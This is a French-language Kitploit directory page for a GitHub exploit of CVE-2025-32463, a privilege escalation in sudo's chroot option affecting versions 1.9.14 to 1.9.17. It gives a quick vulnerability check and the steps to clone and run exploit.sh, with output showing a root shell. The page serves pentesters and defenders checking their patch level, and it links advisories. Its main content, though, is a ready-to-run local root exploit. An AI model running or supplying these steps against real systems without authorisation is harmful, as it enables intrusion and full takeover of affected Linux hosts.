Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32463 — This is the exploit for the CVE-2025-32463 | Kitploit
Outils/GitHubGitHub/rajneeshkarya/cve-2025-32463
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubrajneeshkarya/cve-2025-32463

CVE-2025-32463

This is the exploit for the CVE-2025-32463

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE-2025-32463

Ceci est l'exploit pour le CVE-2025-32463

  • Merci à Rich Mirch (@0xm1rch sur X) @ Stratascale pour avoir signalé cette incroyable vulnérabilité.
  • Publication originale : Avis de vulnérabilité : Élévation de privilèges via sudo chroot
  • NVD : CVE-2025-32463 (CVSS 9.3)

Versions concernées

Les versions vulnérables de sudo 1.9.14 à 1.9.17 (toutes les p‑révisions) sur la plupart des distributions Linux sont concernées.

Pages de sécurité

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

Vérification rapide de la vulnérabilité

root@kitploit:~
# Un sudo vulnérable vous donnera ceci
kairaj5456 ~ $ sudo -R fake_root fake_root
sudo: fake_root: No such file or directory

# Un sudo corrigé vous donnera ceci
kairaj5456 ~ $ sudo -R fake_root fake_root
[sudo] password for kairaj5456:
sudo: you are not permitted to use the -R option with fake_root

Test de l'exploit

root@kitploit:~
$ git clone https://github.com/Rajneeshkarya/CVE-2025-32463.git

$ cd CVE-2025-32463

$ chmod +x exploit.sh

$ ./exploit.sh

[+] Lancement de l'exploit via sudo...

# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),117(bluetooth),121(wireshark),129(scanner),136(kaboxer),1000(kairaj5456)

Pour comprendre la vulnérabilité

Consultez le blog original publié par Rich Mirch - cliquez ici

Télécharger l’outil